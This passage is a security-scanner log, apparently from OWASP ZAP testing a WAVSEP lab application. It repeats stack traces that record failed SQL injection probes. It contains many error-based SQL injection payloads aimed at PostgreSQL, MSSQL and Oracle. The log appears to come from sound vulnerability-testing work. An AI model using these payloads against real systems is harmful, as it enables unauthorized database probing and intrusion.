SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 4296=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4296=4296) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 4296=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (4296=4296) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679635 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8413=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8413=8413) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- pEcn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8413=CAST((CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (8413=8413) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC)-- pEcn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679636 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 2835=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2835=2835) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4314=4314] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2835=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2835=2835) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND (4314=4314 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679637 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 8747=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8747=8747) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8747=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8747=8747) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679638 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 6840=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6840=6840) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('RYpH'='RYpH] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 6840=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6840=6840) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('RYpH'='RYpH at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679638 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 4384=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'uoQp'='uoQp] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 4384=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4384=4384) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'uoQp'='uoQp at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679640 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 8800=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8800=8800) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8800=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (8800=8800) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679640 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 4717=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4717=4717) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- jDGW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 4717=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4717=4717) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- jDGW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679641 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 1311=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1311=1311) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (2710=2710] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 1311=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1311=1311) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (2710=2710 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679642 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7081=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7081=7081) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7081=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7081=7081) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679643 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 5340=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5340=5340) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('idKr'='idKr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 5340=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5340=5340) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('idKr'='idKr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679644 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 5233=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5233=5233) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'FlCC'='FlCC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5233=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (5233=5233) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'FlCC'='FlCC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 